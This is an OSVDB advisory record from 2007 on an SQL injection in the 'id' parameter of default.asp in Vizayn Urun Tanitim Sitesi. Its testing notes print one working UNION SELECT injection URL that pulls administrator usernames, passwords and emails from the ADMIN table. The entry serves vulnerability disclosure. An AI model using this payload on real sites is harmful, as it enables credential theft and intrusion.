Vizayn Urun Tanitim Sitesi default.asp id Variable SQL Injection

2007-05-21T13:03:47
ID OSVDB:36232
Type osvdb
Reporter OSVDB
Modified 2007-05-21T13:03:47

Description

Manual Testing Notes

http://[target]/[PATH]/default.asp?islem=haberdetay&id=-1%20union%20select%20USERNAME,PASSWORD,EMAIL,USERNAME%20from%20ADMIN

References:

Secunia Advisory ID:25348 ISS X-Force ID: 34403 Generic Exploit URL: http://www.milw0rm.com/exploits/4007 CVE-2007-2803 Bugtraq ID: 24238 Bugtraq ID: 24079